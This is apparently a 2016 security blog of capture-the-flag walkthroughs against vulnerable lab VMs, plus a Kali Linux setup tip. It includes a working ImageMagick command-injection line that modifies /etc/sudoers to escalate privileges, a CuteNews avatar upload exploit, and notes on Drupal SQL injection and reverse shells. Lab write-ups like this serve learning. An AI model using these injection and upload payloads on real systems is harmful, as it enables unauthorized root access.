Tuesday, 24 May 2016

Gibson challenge



Good, we have found our target. Now, we are able to scan a little deeper

Great! We have pleasure with no complex VM, because open are only two ports 80 and 22. I prefer examine web application.

Hmmm, it is strange for you also? Let's check what is in davinci.html

Probably it is some kind of hint. I am wondering about brute-force SSH, but don't know username and password both. In this case brute force would take a long time. So, let's run dirbuster
Hmmm, dirbuster found nothing interesting, I was trying perform brute-force, where username is davinci, but without success :-(
So, we should examine version of Apache Web Server and OpenSSH. As far as I know OpenSSH may be vulnerable to predictable PRNG. Damn it! It also gave me nothing interesting... Now I am pretty sure that /davinci.html MUST contain something helpful!

Probably username is margo and password is god, let's try via SSH log in.

Excellent! We have got limited shell! Let's check what kind of action we are able to perform via sudo
 Quite interesting!
I have verified that we have pleasure with Ubuntu 14.04.03, so I know that exist local root exploit

Game over! Thanks

As we can see the challenge was very easy and didn't require advanced hacking tools and skills. All what we needed was time.

PS. I am going to try to find another way to hack this machine

Second way - privilege escalation.
I was looking for details about convert Linux command and potentially vulns, and I have found CVE-2016-3714.
So , we are able to inject any shell command into convert syntax
Well, I have add write permission for root to sudoers file via
sudo convert 'https://example.com"|chmod +x "/etc/sudoers' out.png
 and I have changed part of content to
margo ALL= (ALL:ALL) ALL

We have got root again :-)

Sunday, 22 May 2016

Kali Linux 2.0 on VMWare

Hi all,
I had a lot of problems with performance my Kali Linux 2.0 on VMWare Workstation. I have downloaded a iso image from official Kali Linux website. After installation on VMWare workstation I had problems - the Kali Linux was working very slow (for example during launch web browser). I experimented with processor options, etc. I changed desktop environment from GNOME to XFCE. Everything I was trying - without success.
In my case one manner has got my goal - Kali Linux 2.0 which works and isn't lagging.
I have download Kali Linux 2.0 Light version (this version doesn't contain all tools) and I have installed everything that has Kali Linux 2.0 Full via following command:
sudo apt-get upgrade -y && sudo apt-get install kali-linux-full -y
Now I am very glad that I have efficient Kali Linux 2.0 full with XFCE desktop environment :-)

Friday, 6 May 2016

Droopy CTF

Today im going to present you a walkthrough of Droopt challenge.
root@osboxes:~# nmap -sP


Nmap scan report for
Host is up (0.00054s latency).
MAC Address: 00:0C:29:4F:82:66 (VMware)


root@osboxes:~# nmap -p-


80/tcp open  http
MAC Address: 00:0C:29:4F:82:66 (VMware)
I open a browser and display the web application.

OK, I was trying conduct SQL Injection and default credentials attack but without success. So I examine a source code and BINGO!

Drupal 7 contains several vulnerabilities.I found one of them  -SQL Injection, I executed it and...

Excellent! We should verify this good news.

Great! We logged into admin account! We have to find some way upload a backdoor. I was trying with Avatar, with Add Content but without success.
Finally I found helpful options

Now we should check the PHP Filter and try inject into page content our reverse shell code.


Excellent! We have gained limited shell!
We can check OS with details and find an exploit to escalate our peivileges (as an exercise for you).

Game over!

BNE0x03 challenge

Hi again,
Today I would like to present BNE0x03 walkthrough.

So, as always we should find our target
root@osboxes:~# nmap -sP

Starting Nmap 6.47 ( http://nmap.org ) at 2016-05-06 09:02 BST
Nmap scan report for
Host is up (0.0018s latency).
MAC Address: 00:0C:29:4E:16:F6 (VMware)

root@osboxes:~# nmap -sV

Starting Nmap 6.47 ( http://nmap.org ) at 2016-05-06 09:05 BST
Nmap scan report for
Host is up (0.0011s latency).
Not shown: 999 closed ports
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

Scanning all ports does not give us differnt result.
Now, we browse our target

Maybe exist some exploit for CuteNews v.2.0.3? I don't know, but probably I will verify it.
Let's run dirb now.
root@osboxes:~# dirb


==> DIRECTORY:                                     
==> DIRECTORY:                                     
+ (CODE:200|SIZE:1150)                       
+ (CODE:200|SIZE:2487)                         
+ (CODE:403|SIZE:293)                      
==> DIRECTORY:                                    
It looks interesting, probably the application has upload feathure.
I was trying bypass authentication via SQL Injection but without success. But I found exploit to CuteNews 2.0.3.
 # Exploit  :
Vuln :
 1 - Sign up for New User
 2 - Log In
 3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
 4 - Select Upload Avatar Example: Evil.jpg
 5 - use tamper data  & Rename File Evil.jpg to Evil.php
-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\
6 - Your Shell :
OK, so we have to follow the instruction. I register some account
 and I am logged into the application now :-)

Great, now we have to go to the Personal options and upload our avatar (reverse shell). I have uploaded my reverse shell file and I have got

Excellent we have got limited shell.
$ uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux
I know that all what we need is exploit to get root privileges. I found Ubuntu 14.04 LTS, 15.10 - overlayfs Local Root Exploit.
I leave you now at this stage to complete the challenge as an exercise for you :-)

Game over!